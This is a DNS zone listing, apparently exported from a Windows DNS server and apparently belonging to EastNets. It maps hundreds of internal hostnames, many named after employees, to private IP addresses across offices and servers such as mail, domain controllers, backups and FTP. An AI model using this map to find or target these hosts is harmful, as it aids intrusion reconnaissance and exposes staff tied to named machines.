+CPLDEMO [Aging:3617872] 1200 A	192.168.100.216
+CPLDEV [Aging:3618319] 1200 A	192.168.100.214
+CPLVM [Aging:3618326] 1200 A	192.168.100.212
+CPLVM2 [Aging:3614172] 1200 A	192.168.100.224
+CRMMAIL 3600 CNAME	enfs.eastnets.com.
+davids [Aging:3597838] 1200 A	10.10.10.88
+Dawn-PC [Aging:3605317] 1200 A	192.168.153.162
+dell [Aging:3617286] 1200 A	10.10.10.116
+DELL-PC [Aging:3615369] 1200 A	10.10.10.122
+DEVDB [Aging:3618325] 1200 A	192.168.100.182
+devres [Aging:3604428] 1200 A	192.168.100.238
+DevVM [Aging:3612537] 1200 A	192.168.0.182
+dialin 3600 A	192.168.0.7
+Discovery 3600 A	192.168.253.166
+DMZ1 3600 A	192.168.253.142
+DOTDEV [Aging:3601550] 1200 A	192.168.100.187
+DOUBLE1 [Aging:3608515] 1200 A	192.168.0.144
+DOUBLE2 [Aging:3608517] 1200 A	192.168.0.140
+DOUBLETAKE [Aging:3609653] 1200 A	192.168.0.64
+dt2 [Aging:3603444] 1200 A	10.10.0.56
+Dubaiprinter 3600 A	10.10.10.3
+DXB-AROUSAN [Aging:3614164] 1200 A	10.10.10.95
+Dynamo 3600 A	192.168.253.121
+dzovi [Aging:3610544] 1200 A	192.168.253.48
+Easi 3600 A	192.168.253.15
+eastnets-49e020 [Aging:3601814] 1200 A	192.168.153.153
+eastnets-5c9349 [Aging:3599963] 1200 A	192.168.253.124
+eastnets-74007f [Aging:3602292] 1200 A	192.168.251.23
+eastnets-a1jtim [Aging:3607666] 1200 A	192.168.50.95
+eastnets-ae3f26 [Aging:3601817] 1200 A	192.168.153.108
+eastnets-bade3b [Aging:3618318] 1200 A	192.168.253.233
+eastnets1 [Aging:3618326] 1200 A	10.10.0.120
+eastranet 3600 A	192.168.0.12
+EismailLap [Aging:3610710] 1200 A	10.10.0.65
+ELASTIK [Aging:3606800] 1200 A	192.168.50.138
+en-ms [Aging:3600301] 1200 A	10.10.10.70
+ENAM-Ahmed [Aging:3606517] 1200 A	192.168.50.47
+enamacc003 [Aging:3618292] 900 A	192.168.0.61
+enamacc004 [Aging:3618298] 900 A	192.168.0.218
+enamacc02 [Aging:3618293] 900 A	192.168.50.156
+ENAMACC07 [Aging:3610807] 1200 A	192.168.50.65
+ENAMAHMED-PC [Aging:3614386] 1200 A	192.168.50.89
+ENAMBackup001 [Aging:3618131] 1200 A	192.168.0.25
+ENAMBackup01 [Aging:3618322] 1200 A	192.168.0.25
+ENAMBB001 [Aging:3618327] 1200 A	192.168.0.8
+ENAMBSS001 [Aging:3611406] 1200 A	192.168.0.185
+ENAMCRM01 [Aging:3618326] 1200 A	192.168.0.14
+enamcruise [Aging:3604978] 1200 A	192.168.0.28
+ENAMCS001 [Aging:3618301] 900 A	192.168.50.34
+enamdata [Aging:3618318] 1200 A	192.168.0.22
+ENAMDDEV [Aging:3618303] 900 A	192.168.0.153
+ENAMDES004 [Aging:3614382] 1200 A	192.168.128.50
+		 [Aging:3614382] 1200 A	192.168.0.222
+ENAMDES02 [Aging:3607542] 1200 A	192.168.0.181
+		 [Aging:3607542] 1200 A	192.168.0.175
+ENAMDEV001 [Aging:3613044] 1200 A	192.168.50.194
+ENAMDEV004 [Aging:3618288] 900 A	192.168.0.138
+enamdev01 [Aging:3611334] 1200 A	192.168.0.159
+		 [Aging:3611334] 1200 A	192.168.50.169
+enamdev013 [Aging:3608506] 1200 A	192.168.0.98
+ENAMDEV022 [Aging:3618300] 900 A	192.168.0.59
+ENAMDEV025 [Aging:3618299] 900 A	192.168.0.115
+ENAMDEV029 [Aging:3610304] 1200 A	10.10.10.67
+ENAMDEV040 [Aging:3605793] 1200 A	192.168.50.63
+enamdev045 [Aging:3618293] 900 A	192.168.50.61
+ENAMDEV046 [Aging:3618299] 900 A	192.168.50.72
+ENAMDEV047 [Aging:3618294] 900 A	192.168.0.159
+ENAMDEV052 [Aging:3608982] 1200 A	192.168.50.32
+ENAMDEV057 [Aging:3618295] 900 A	192.168.0.230
+ENAMDEV063 [Aging:3618312] 1200 A	192.168.0.209
+ENAMDEV064 [Aging:3618326] 900 A	192.168.0.204
+ENAMDEV065 [Aging:3618312] 900 A	192.168.0.199
+ENAMDEV068 [Aging:3611167] 1200 A	192.168.0.35
+ENAMDEV069 [Aging:3618297] 900 A	192.168.0.95
+ENAMDEV072 [Aging:3609804] 1200 A	192.168.0.201
+		 [Aging:3609804] 1200 A	192.168.50.74
+ENAMDEV074 [Aging:3618294] 900 A	192.168.0.112
+ENAMDEV075 [Aging:3618302] 900 A	192.168.0.216
+ENAMDEV076 [Aging:3618260] 1200 A	10.10.200.22
+ENAMDEV078 [Aging:3618302] 900 A	192.168.0.80
+ENAMDEV080 [Aging:3618294] 900 A	192.168.0.177
+ENAMDEV081 [Aging:3618113] 1200 A	10.10.200.64
+ENAMDEV082 [Aging:3618293] 900 A	192.168.0.71
+ENAMDEV083 [Aging:3618299] 1200 A	10.10.200.16
+ENAMDEV088 [Aging:3612515] 1200 A	192.168.50.135
+ENAMDEV089 [Aging:3618305] 900 A	192.168.0.192
+ENAMDEV092 [Aging:3608981] 1200 A	192.168.50.92
+enamdev096 [Aging:3618326] 900 A	192.168.0.193
+ENAMDEV097 [Aging:3618296] 900 A	192.168.0.188
+ENAMDEV101 [Aging:3610236] 1200 A	192.168.50.77
+ENAMDEV102 [Aging:3608988] 1200 A	192.168.0.195
+ENAMDEV103 [Aging:3611244] 1200 A	192.168.50.151
+ENAMDEV104 [Aging:3613430] 1200 A	192.168.0.181
+ENAMDEV105 [Aging:3618293] 900 A	192.168.0.74
+ENAMDEV107 [Aging:3616185] 1200 A	192.168.0.121
+		 [Aging:3616185] 1200 A	192.168.50.41
+ENAMDEV108 [Aging:3618300] 900 A	192.168.0.118
+ENAMDEV109 [Aging:3618302] 900 A	192.168.0.190
+ENAMDEV110 [Aging:3618300] 900 A	192.168.0.201
+ENAMDEV111 [Aging:3618299] 900 A	192.168.0.202
+ENAMDEV112 [Aging:3614721] 1200 A	192.168.50.65
+ENAMDEV115 [Aging:3618299] 900 A	192.168.0.165
+ENAMDEV116 [Aging:3615899] 1200 A	192.168.0.171
+		 [Aging:3615899] 1200 A	192.168.0.212
+ENAMDEV118 [Aging:3615774] 1200 A	192.168.0.154
+ENAMDEV121 [Aging:3618309] 900 A	192.168.0.158
+ENAMDEV122 [Aging:3618302] 900 A	192.168.0.149
+enamdev123 [Aging:3618292] 900 A	192.168.0.66
+ENAMDEV124 [Aging:3618294] 900 A	192.168.0.163
+ENAMDPDM01 [Aging:3618302] 900 A	192.168.50.35
+ENAMENG001 [Aging:3618292] 900 A	192.168.0.85
+ENAMENG002 [Aging:3618293] 900 A	192.168.0.52
+ENAMENG003 [Aging:3618301] 900 A	192.168.0.169
+enameng004 [Aging:3618163] 1200 A	10.10.200.18
+ENAMENG005 [Aging:3610164] 1200 A	192.168.0.177
+ENAMEPMTEST [Aging:3610715] 1200 A	192.168.0.116
+ENAMGM01 [Aging:3609846] 1200 A	192.168.50.116
+ENAMGM03 [Aging:3618295] 900 A	192.168.50.164
+ENAMGP002 [Aging:3610208] 1200 A	192.168.50.95
+ENAMGP01 [Aging:3618308] 1200 A	192.168.0.13
+ENAMGPTEST [Aging:3606612] 1200 A	192.168.50.109
+ENAMHANADI [Aging:3612585] 1200 A	192.168.50.58
+ENAMHR001 [Aging:3616880] 1200 A	10.10.10.64
+enamhr002 [Aging:3607525] 1200 A	192.168.50.103
+ENAMHR007 [Aging:3618295] 900 A	192.168.50.82
+ENAMHR008 [Aging:3618297] 900 A	192.168.0.97
+ENAMHRBACKUP [Aging:3613403] 1200 A	192.168.0.139
+ENAMHRMGR [Aging:3618253] 1200 A	10.10.200.16
+ENAMHYPER01 [Aging:3618325] 1200 A	192.168.0.37
+ENAMHYPER02 [Aging:3618325] 1200 A	192.168.0.38
+ENAMIT [Aging:3610835] 1200 A	192.168.50.65
+		 [Aging:3610835] 1200 A	192.168.50.87
+ENAMIT001 [Aging:3608130] 1200 A	10.10.200.8
+enamit002 [Aging:3610879] 1200 A	192.168.0.150
+ENAMIT003 [Aging:3618297] 900 A	192.168.0.166
+ENAMIT005 [Aging:3618299] 900 A	192.168.0.233
+ENAMITBACKUP001 [Aging:3608624] 1200 A	192.168.0.232
+ENAMITBACKUP02 [Aging:3618308] 900 A	192.168.0.100
+ENAMITOMAR [Aging:3618309] 900 A	192.168.0.157
+enamittest01 [Aging:3609456] 1200 A	192.168.0.35
+enamlearn2 [Aging:3616256] 1200 A	192.168.0.219
+ENAMLYNC2010 [Aging:3618324] 1200 A	192.168.0.27
+ENAMMAD001 [Aging:3618331] 3600 A	192.168.0.15
+ENAMMAD002 [Aging:3618330] 3600 A	192.168.0.16
+ENAMmajed [Aging:3618309] 900 A	192.168.0.62
+ENAMMDEV01 [Aging:3618294] 900 A	192.168.0.198
+enammIS [Aging:3608363] 1200 A	192.168.100.102
+ENAMMIT [Aging:3611846] 1200 A	192.168.50.53
+ENAMPDM002 [Aging:3616596] 1200 A	192.168.50.34
+		 [Aging:3616596] 1200 A	192.168.0.192
+enampdm003 [Aging:3618300] 900 A	192.168.0.186
+enampdm004 [Aging:3611239] 1200 A	192.168.0.201
+ENAMPDM007 [Aging:3612658] 1200 A	192.168.0.118
+ENAMPDM009 [Aging:3613925] 1200 A	10.10.10.89
+ENAMPDM011 [Aging:3617029] 1200 A	192.168.50.161
+ENAMPDM012 [Aging:3618301] 900 A	192.168.0.191
+enampdm013 [Aging:3618302] 900 A	192.168.0.117
+ENAMPRINTER01 [Aging:3618319] 1200 A	192.168.0.243
+enamprinter02 [Aging:3618324] 1200 A	192.168.0.241
+enamprinter03 [Aging:3618319] 1200 A	192.168.0.242
+enamprinter04 [Aging:3610062] 1200 A	192.168.0.246
+ENAMPRO001 [Aging:3607063] 1200 A	192.168.253.70
+ENAMQA001 [Aging:3618298] 900 A	192.168.0.174
+ENAMQA01 [Aging:3618301] 900 A	192.168.50.117
+ENAMQA011 [Aging:3618300] 900 A	192.168.0.170
+ENAMQA012 [Aging:3618288] 900 A	192.168.50.103
+ENAMQA014 [Aging:3618297] 1200 A	10.10.200.8
+ENAMQA018 [Aging:3618302] 900 A	192.168.50.139
+ENAMQA021 [Aging:3617291] 1200 A	10.10.200.28
+ENAMQA028 [Aging:3618305] 900 A	192.168.0.185
+ENAMQA029 [Aging:3618300] 900 A	192.168.50.98
+enamqa030 [Aging:3618299] 900 A	192.168.50.47
+ENAMQABACKUP [Aging:3615582] 1200 A	192.168.0.170
+ENAMQABACKUP3 [Aging:3618324] 900 A	192.168.50.135
+ENAMQATEST01 [Aging:3608960] 1200 A	192.168.50.70
+ENAMRESEARCH002 [Aging:3597917] 1200 A	10.10.10.54
+ENAMRESILIENCE [Aging:3618317] 1200 A	192.168.100.235
+ENAMSALE002 [Aging:3613232] 1200 A	192.168.0.55
+ENAMSALE008 [Aging:3617602] 1200 A	10.10.10.76
+ENAMSALE010 [Aging:3612730] 1200 A	10.10.10.149
+ENAMSALE011 [Aging:3618298] 900 A	192.168.0.103
+ENAMSEC007 [Aging:3614741] 1200 A	192.168.0.92
+ENAMSEC008 [Aging:3614405] 1200 A	192.168.0.106
+ENAMSEC009 [Aging:3618301] 900 A	192.168.0.226
+ENAMSEC010 [Aging:3618308] 900 A	192.168.0.203
+enamsp002 [Aging:3618296] 900 A	192.168.0.78
+ENAMSP01 [Aging:3618312] 1200 A	192.168.0.12
+ENAMSP2010 [Aging:3617364] 1200 A	192.168.0.36
+ENAMSP2013 [Aging:3614910] 1200 A	192.168.0.111
+enamsw008 [Aging:3601336] 1200 A	192.168.253.116
+enamsw009 [Aging:3596909] 1200 A	10.10.10.32
+enamsw010 [Aging:3599145] 1200 A	10.10.10.118
+enamsw011 [Aging:3607784] 1200 A	192.168.50.148
+ENAMSW027 [Aging:3618301] 900 A	192.168.0.167
+ENAMSW029 [Aging:3618297] 900 A	192.168.0.128
+ENAMSW030 [Aging:3612175] 1200 A	192.168.50.121
+ENAMSW031 [Aging:3618299] 900 A	192.168.0.76
+ENAMSW032 [Aging:3616263] 1200 A	192.168.50.101
+ENAMSW033 [Aging:3618299] 900 A	192.168.50.104
+ENAMSW036 [Aging:3618329] 1200 A	192.168.153.135
+ENAMSW037 [Aging:3618300] 1200 A	10.10.200.18
+ENAMSW038 [Aging:3618327] 1200 A	192.168.253.131
+ENAMSW043 [Aging:3618302] 900 A	192.168.0.146
+ENAMSW044 [Aging:3618299] 900 A	192.168.50.46
+ENAMSW047 [Aging:3618310] 1200 A	10.10.10.135
+ENAMSW049 [Aging:3605934] 1200 A	192.168.50.67
+enamsw051 [Aging:3610547] 1200 A	192.168.0.146
+enamsw054 [Aging:3606110] 1200 A	192.168.50.68
+ENAMSW055 [Aging:3612033] 1200 A	192.168.0.52
+enamsw056 [Aging:3609877] 1200 A	192.168.0.107
+ENAMSW059 [Aging:3618295] 900 A	192.168.0.120
+ENAMSW062 [Aging:3618299] 900 A	192.168.0.235
+ENAMSW063 [Aging:3618295] 900 A	192.168.0.206
+ENAMSW065 [Aging:3618293] 900 A	192.168.0.217
+ENAMSW066 [Aging:3618299] 900 A	192.168.50.128
+ENAMSW067 [Aging:3618293] 900 A	192.168.0.136
+ENAMSW068 [Aging:3618321] 900 A	192.168.0.224
+ENAMTARINER01 [Aging:3616448] 1200 A	192.168.0.54
+ENAMTRAINER02 [Aging:3616595] 1200 A	192.168.50.240
+enamtw001 [Aging:3618295] 900 A	192.168.0.142
+ENAMTW002 [Aging:3618300] 900 A	192.168.0.240
+ENAMVCAS01 [Aging:3618325] 1200 A	192.168.0.42
+ENAMVCAS02 [Aging:3618330] 1200 A	192.168.0.45
+ENAMVHUB01 [Aging:3618325] 1200 A	192.168.0.43
+ENAMVHUB02 [Aging:3618331] 1200 A	192.168.0.46
+ENAMVM0010 [Aging:3617288] 1200 A	192.168.100.54
+ENAMVM003 [Aging:3618225] 1200 A	192.168.100.52
+ENAMVM004 [Aging:3618321] 1200 A	192.168.100.53
+ENAMVM005 [Aging:3614004] 1200 A	192.168.50.62
+ENAMVM006 [Aging:3614001] 1200 A	192.168.0.54
+ENAMVM007 [Aging:3614053] 1200 A	192.168.0.81
+ENAMVM008 [Aging:3618252] 1200 A	192.168.100.55
+ENAMVMAIL01 [Aging:3618322] 1200 A	192.168.0.44
+ENAMVmail02 [Aging:3618321] 1200 A	192.168.0.47
+ENAMWIN8 [Aging:3610903] 1200 A	192.168.50.44
+ENANAS [Aging:3616739] 1200 A	192.168.0.218
+Enas-PC [Aging:3614194] 1200 A	10.10.0.199
+ENattendance [Aging:3618319] 1200 A	192.168.100.240
+ENBABILOUET [Aging:3603201] 1200 A	192.168.253.158
+ENBALENAERTS [Aging:3618327] 1200 A	192.168.253.62
+enbaraskin [Aging:3610191] 1200 A	192.168.253.217
+ENBAVASSART [Aging:3618319] 1200 A	192.168.253.39
+enbavergine [Aging:3602462] 1200 A	192.168.253.93
+ENBCCARVALHO [Aging:3618324] 1200 A	192.168.253.76
+enbddutheil [Aging:3599269] 1200 A	192.168.253.131
+ENBDSWF [Aging:3610834] 1200 A	192.168.100.153
+ENBDSWF2 [Aging:3605841] 1200 A	192.168.50.32
+ENBDZOVI [Aging:3618299] 1200 A	192.168.253.64
+enbe-dsottiau [Aging:3613072] 1200 A	192.168.253.116
+enbeaix02 3600 A	192.168.240.121
+enbeaix03 3600 A	192.168.240.122
+enbeaix04 3600 A	192.168.240.123
+enbeaix05 3600 A	192.168.240.124
+enbeaix06 3600 A	192.168.240.125
+enbeaix07 3600 A	192.168.240.126
+enbeaix08 3600 A	192.168.240.127
+enbeaix09 3600 A	192.168.240.128
+enbeaix10 3600 A	192.168.240.129
+enbeaix11 3600 A	192.168.240.130
+ENBEAKUMAR [Aging:3612680] 1200 A	192.168.253.103
+enbebackup01 [Aging:3607545] 1200 A	192.168.253.232
+ENBEBB01 [Aging:3618322] 1200 A	192.168.253.115
+enbeclapage [Aging:3618329] 1200 A	192.168.253.71
+ENBECO-100 [Aging:3598497] 1200 A	192.168.253.95
+ENBEDC01 [Aging:3618331] 3600 A	192.168.253.230
+ENBEDE-0002 [Aging:3618329] 1200 A	192.168.253.51
+enbede-0005 [Aging:3615753] 1200 A	192.168.253.147
+ENBEDE-0006 [Aging:3610190] 1200 A	192.168.253.140
+ENBEDE-0008 [Aging:3602186] 1200 A	192.168.253.158
+ENBEDE-0010 [Aging:3597919] 1200 A	192.168.253.220
+enbede-0013 [Aging:3611388] 1200 A	192.168.253.221
+ENBEDE-0014 [Aging:3608840] 1200 A	192.168.253.186
+ENBEDE-0015 [Aging:3607710] 1200 A	192.168.253.238
+enbede-0016 [Aging:3602186] 1200 A	192.168.253.62
+enbede-0020 [Aging:3606367] 1200 A	192.168.253.95
+enbede-0021 [Aging:3609085] 1200 A	192.168.253.222
+ENBEDE-0040 [Aging:3600750] 1200 A	192.168.253.192
+ENBEDE-0041 [Aging:3607134] 1200 A	192.168.253.33
+ENBEDE-0042 [Aging:3604287] 1200 A	192.168.253.116
+ENBEDE-0050 [Aging:3603464] 1200 A	192.168.253.71
+ENBEDE-0051 [Aging:3618313] 1200 A	192.168.253.59
+ENBEDE-0052 [Aging:3618313] 1200 A	192.168.253.185
+ENBEDE-0053 [Aging:3600419] 1200 A	192.168.253.88
+enbede-0070 [Aging:3618313] 1200 A	192.168.253.50
+ENBEDE-PQLE [Aging:3598158] 1200 A	192.168.253.168
+ENBEDE0005 [Aging:3618325] 1200 A	192.168.253.147
+ENBEDEMPEETERS [Aging:3615601] 1200 A	192.168.253.184
+ENBEDEVLAP01 [Aging:3606513] 1200 A	192.168.253.184
+ENBEFINET [Aging:3618313] 1200 A	192.168.253.73
+ENBEFNOEL [Aging:3618327] 1200 A	10.10.50.1
+ENBEfortega [Aging:3598279] 1200 A	192.168.253.70
+		 [Aging:3598279] 1200 A	192.168.253.81
+ENBEFPOULET [Aging:3618317] 1200 A	192.168.253.40
+enbefs01 [Aging:3606135] 1200 A	192.168.253.138
+ENBEFTP01 [Aging:3618320] 1200 A	192.168.253.201
+ENBEFVERHAEVER [Aging:3618320] 1200 A	192.168.251.12
+		 [Aging:3618320] 1200 A	10.10.200.128
+ENBEGP01 [Aging:3618325] 1200 A	192.168.253.11
+enbegp1 [Aging:3605533] 1200 A	192.168.253.11
+ENBEGPVM01 [Aging:3607729] 1200 A	192.168.253.135
+ENBEKAVADMIN [Aging:3614779] 1200 A	192.168.240.20
+enbela-0010 [Aging:3603661] 1200 A	192.168.253.135
+enbela-00100 [Aging:3613617] 1200 A	192.168.253.113
+ENBELA-0036 [Aging:3617949] 1200 A	192.168.253.170
+ENBELA-RRIPMEES [Aging:3607810] 1200 A	192.168.253.135
+ENBELAMBERT [Aging:3612394] 1200 A	192.168.253.114
+enbelap-0051 [Aging:3600948] 1200 A	192.168.253.238
+ENBELAP-SUPP02 [Aging:3599461] 1200 A	192.168.253.114
+enbelnx001 3600 A	192.168.253.198
+enbelnx002 3600 A	192.168.253.199
+enbelnx003 3600 A	192.168.253.190
+enbelnx004 3600 A	192.168.253.53
+enbelnx005 3600 A	192.168.253.54
+enbemail01 [Aging:3618327] 1200 A	192.168.253.231
+enbeManager01 [Aging:3614434] 1200 A	192.168.253.199
+enbens01 [Aging:3603877] 1200 A	192.168.253.177
+ENBENSOUDRON [Aging:3610502] 1200 A	192.168.253.48
+enbeprint01 [Aging:3616403] 1200 A	192.168.253.184
+ENBERPATTA [Aging:3618318] 1200 A	192.168.253.168
+enbeslouise [Aging:3604457] 1200 A	192.168.253.153
+ENBETEST-0001 [Aging:3596429] 1200 A	192.168.253.182
+ENBETEST01 [Aging:3618322] 1200 A	192.168.253.112
+ENBETPATNELL [Aging:3618323] 1200 A	192.168.253.146
+ENBEVCAS01 [Aging:3618313] 1200 A	192.168.240.17
+		 [Aging:3618313] 1200 A	192.168.240.15
+ENBEVcas02 [Aging:3618322] 1200 A	192.168.240.16
+		 [Aging:3618322] 1200 A	192.168.240.18
+ENBEVDC1 3600 A	192.168.240.10
+ENBEVHUB01 [Aging:3618313] 1200 A	192.168.240.13
+ENBEVhub02 [Aging:3618322] 1200 A	192.168.240.14
+ENBEVMAIL01 [Aging:3618313] 1200 A	192.168.240.11
+ENBEVMAIL02 [Aging:3618313] 1200 A	192.168.240.12
+enbevmsrv01 [Aging:3600463] 1200 A	192.168.253.251
+ENBEWIM [Aging:3612536] 1200 A	192.168.253.64
+ENBFOGER [Aging:3618323] 1200 A	192.168.253.220
+ENBGMORASCHI [Aging:3618326] 1200 A	192.168.253.136
+enbiarchavlis [Aging:3602703] 1200 A	192.168.253.68
+ENBJDERENNE [Aging:3603321] 1200 A	192.168.253.173
+enbjoudkerk [Aging:3612232] 1200 A	192.168.253.243
+ENBLAP-NGATA [Aging:3611888] 1200 A	192.168.253.31
+ENBLAP-SUPP01 [Aging:3618319] 1200 A	192.168.253.217
+enbnverguyse [Aging:3600847] 1200 A	192.168.253.41
+enbnverguyse1 [Aging:3610381] 1200 A	192.168.253.188
+ENBODENIS [Aging:3618323] 1200 A	192.168.253.93
+ENBPBUELENS [Aging:3603686] 1200 A	192.168.253.76
+enbsgathy [Aging:3606654] 1200 A	192.168.253.139
+enbslouis [Aging:3618295] 1200 A	192.168.253.100
+		 [Aging:3618295] 1200 A	192.168.253.86
+enbvpardal [Aging:3618313] 1200 A	192.168.253.91
+END-JANTES [Aging:3602987] 1200 A	10.10.10.61
+endaedwan [Aging:3618313] 900 A	192.168.0.90
+endarousan [Aging:3599070] 1200 A	10.10.10.151
+endcbackup [Aging:3618329] 3600 A	192.168.2.25
+endCSLebanon1 [Aging:3604973] 1200 A	10.10.10.118
+ENDDBOUGUERRA [Aging:3618300] 1200 A	10.10.10.64
+		 [Aging:3618300] 1200 A	10.10.10.70
+ENDHKHAN [Aging:3601446] 1200 A	10.10.10.113
+endial 3600 A	192.168.0.7
+ENDIIBRAHIM [Aging:3608981] 1200 A	10.10.10.107
+ENDLHEDIAH1 [Aging:3618295] 1200 A	10.10.10.97
+ENDMFARID [Aging:3618293] 1200 A	10.10.10.95
+endmhamza [Aging:3598085] 1200 A	10.10.10.66
+ENDMJAREER [Aging:3618226] 1200 A	10.10.10.24
+endmsalameh [Aging:3614240] 1200 A	10.10.10.139
+ENDOT [Aging:3608531] 1200 A	192.168.100.141
+endrkheir [Aging:3605625] 1200 A	10.10.0.109
+ENDSALLOUM [Aging:3598425] 1200 A	10.10.10.115
+		 [Aging:3598425] 1200 A	10.10.10.20
+enDubai001 [Aging:3618224] 1200 A	10.10.10.23
+endudai0001 [Aging:3610829] 1200 A	10.10.10.67
+ENDXB- [Aging:3612900] 1200 A	10.10.10.138
+ENDXB-ADHAM [Aging:3618311] 1200 A	10.10.10.207
+ENDXB-AGHALION [Aging:3598210] 1200 A	10.10.10.112
+ENDXB-AHAMSA [Aging:3618297] 1200 A	10.10.10.56
+endxb-Amahmoud [Aging:3614170] 1200 A	10.10.10.85
+ENDXB-AMJAD [Aging:3618292] 1200 A	10.10.10.90
+ENDXB-ARD [Aging:3614720] 1200 A	10.10.10.51
+		 [Aging:3614720] 1200 A	10.10.10.54
+endxb-ashraf [Aging:3599890] 1200 A	10.10.10.51
+ENDXB-ASUMERIN [Aging:3614050] 1200 A	10.10.10.103
+endxb-bcampbell [Aging:3604040] 1200 A	192.168.253.55
+ENDXB-CALTAKI [Aging:3618290] 1200 A	10.10.10.20
+ENDXB-Cobas [Aging:3618298] 1200 A	10.10.10.131
+ENDXB-Danielekhoury [Aging:3618248] 1200 A	10.10.10.128
+endxb-dbouguerra [Aging:3609221] 1200 A	10.10.10.110
+ENDXB-DKHOURY [Aging:3618196] 1200 A	10.10.10.42
+ENDXB-DMASAD [Aging:3618295] 1200 A	10.10.10.41
+endxb-dpallavi [Aging:3615123] 1200 A	10.10.10.56
+ENDXB-DSAMAWI [Aging:3612391] 1200 A	10.10.10.119
+ENDXB-ELSA [Aging:3618298] 1200 A	10.10.10.83
+ENDXB-EMAGSOMBOL [Aging:3604973] 1200 A	10.10.10.130
+ENDXB-FTP [Aging:3618325] 1200 A	10.10.10.250
+ENDXB-GBAGCAT [Aging:3616616] 1200 A	10.10.10.57
+endxb-ghaith [Aging:3608001] 1200 A	10.10.10.118
+endxb-gjarrar [Aging:3600469] 1200 A	10.10.10.82
+ENDXB-Halikhan [Aging:3617286] 1200 A	10.10.10.116
+ENDXB-HCHAMAS [Aging:3615345] 1200 A	10.10.10.119
+ENDXB-HMULHIM [Aging:3618277] 1200 A	192.168.253.3
+		 [Aging:3618277] 1200 A	192.168.253.114
+Endxb-hp [Aging:3617695] 1200 A	10.10.10.64
+ENDXB-Hreyes [Aging:3618300] 1200 A	10.10.10.96
+		 [Aging:3618300] 1200 A	10.10.10.125
+endxb-htahrawi [Aging:3613735] 1200 A	10.10.10.128
+ENDXB-IBRAHIM [Aging:3610019] 1200 A	10.10.10.109
+Endxb-iibrahim [Aging:3618295] 1200 A	10.10.10.71
+endxb-jsalinog [Aging:3618292] 1200 A	10.10.10.61
+ENDXB-kaisarshahzad [Aging:3617069] 1200 A	10.10.10.78
+ENDXB-KALOMARI [Aging:3604818] 1200 A	10.10.200.13
+endxb-kbaluyot [Aging:3618301] 1200 A	10.10.10.46
+ENDXB-KPURSWANI [Aging:3609661] 1200 A	10.10.10.34
+		 [Aging:3609661] 1200 A	10.10.10.29
+ENDXB-KRISTINE [Aging:3610636] 1200 A	10.10.10.154
+		 [Aging:3610636] 1200 A	10.10.10.93
+ENDXB-KSHAHZAD [Aging:3610876] 1200 A	10.10.10.82
+ENDXB-LHEDIAH [Aging:3597107] 1200 A	10.10.10.140
+ENDXB-LMARSHOUD [Aging:3598283] 1200 A	10.10.10.121
+ENDXB-MAGDA [Aging:3600812] 1200 A	10.10.10.163
+		 [Aging:3600812] 1200 A	10.10.10.133
+ENDXB-MAGDAH [Aging:3601831] 1200 A	10.10.10.138
+ENDXB-MAGDAHAMZA [Aging:3600825] 1200 A	10.10.10.133
+ENDXB-MARYANNE [Aging:3613372] 1200 A	10.10.10.38
+endxb-marylowry [Aging:3618205] 1200 A	10.10.10.36
+ENDXB-MDABBAGH [Aging:3616930] 1200 A	10.10.10.118
+endxb-mderiada [Aging:3617261] 1200 A	10.10.10.64
+ENDXB-MDKHAYYAM [Aging:3618298] 1200 A	10.10.10.74
+ENDXB-MHAMZA [Aging:3608621] 1200 A	10.10.10.110
+ENDXB-MJARABEJO [Aging:3604448] 1200 A	10.10.10.107
+endxb-mjareer [Aging:3601230] 1200 A	10.10.10.37
+ENDXB-MLEMORINAS [Aging:3607186] 1200 A	10.10.10.109
+		 [Aging:3607186] 1200 A	10.10.10.79
+ENDXB-MLEMORNAS [Aging:3618296] 1200 A	10.10.10.28
+ENDXB-MMAALI [Aging:3598764] 1200 A	10.10.10.125
+ENDXB-Mmulhim [Aging:3618248] 1200 A	10.10.10.128
+ENDXB-MNAHAWI [Aging:3618300] 1200 A	10.10.10.108
+ENDXB-MNAYFEH [Aging:3617629] 1200 A	10.10.10.114
+ENDXB-MRABAINO [Aging:3618292] 1200 A	10.10.10.88
+		 [Aging:3618292] 1200 A	10.10.10.107
+ENDXB-MSAEED [Aging:3618295] 1200 A	10.10.10.73
+ENDXB-MSYED [Aging:3616927] 1200 A	10.10.10.74
+ENDXB-Msyed2 [Aging:3618292] 1200 A	10.10.10.122
+endxb-mtiero [Aging:3618300] 1200 A	10.10.10.47
+ENDXB-MZAIDI [Aging:3610209] 1200 A	10.10.10.53
+endxb-oasseedeh [Aging:3597373] 1200 A	10.10.10.82
+endxb-osaid [Aging:3599119] 1200 A	10.10.10.27
+ENDXB-PPU [Aging:3605959] 1200 A	10.10.10.225
+ENDXB-QAIS [Aging:3618292] 1200 A	10.10.10.59
+ENDXB-QIDRISI [Aging:3613589] 1200 A	10.10.10.135
+ENDXB-RAGARWAL [Aging:3611219] 1200 A	10.10.10.73
+ENDXB-RAJESHK [Aging:3615373] 1200 A	10.10.10.92
+ENDXB-RASHA [Aging:3611548] 1200 A	10.10.10.39
+ENDXB-RAYMOND [Aging:3603492] 1200 A	10.10.10.154
+ENDXB-RAZA [Aging:3614801] 1200 A	10.10.10.28
+		 [Aging:3614801] 1200 A	10.10.10.121
+ENDXB-RAZMI [Aging:3597251] 1200 A	10.10.10.184
+ENDXB-RChanine [Aging:3599050] 1200 A	10.10.10.90
+endxb-rcunanan [Aging:3617555] 1200 A	10.10.10.126
+ENDXB-ROWENA [Aging:3612701] 1200 A	10.10.10.66
+endxb-rowena-pc [Aging:3618296] 1200 A	10.10.10.102
+ENDXB-SALAMEH [Aging:3599238] 1200 A	10.10.10.86
+ENDXB-SALES [Aging:3618316] 1200 A	192.168.3.101
+ENDXB-SALVA [Aging:3597221] 1200 A	10.10.10.49
+endxb-sfawadleh [Aging:3612323] 1200 A	10.10.10.147
+ENDXB-SMAHMOUD [Aging:3618296] 1200 A	10.10.10.76
+ENDXB-SMAKKIEH [Aging:3600835] 1200 A	10.10.10.142
+ENDXB-SWETHA [Aging:3600296] 1200 A	10.10.10.159
+endxb-theobaxte [Aging:3597436] 1200 A	10.10.10.80
+ENDXB-TKEYROUZ [Aging:3616231] 1200 A	10.10.10.120
+ENDXB-Vanessa [Aging:3617767] 1200 A	10.10.10.77
+ENDXB-VANTONIO [Aging:3611989] 1200 A	10.10.10.97
+ENDXBABUGHALION [Aging:3601325] 1200 A	10.10.10.99
+ENDXBAD [Aging:3618296] 1200 A	10.10.10.54
+ENDXBARD [Aging:3614745] 1200 A	10.10.10.51
+endxbcrm [Aging:3618311] 1200 A	192.168.3.11
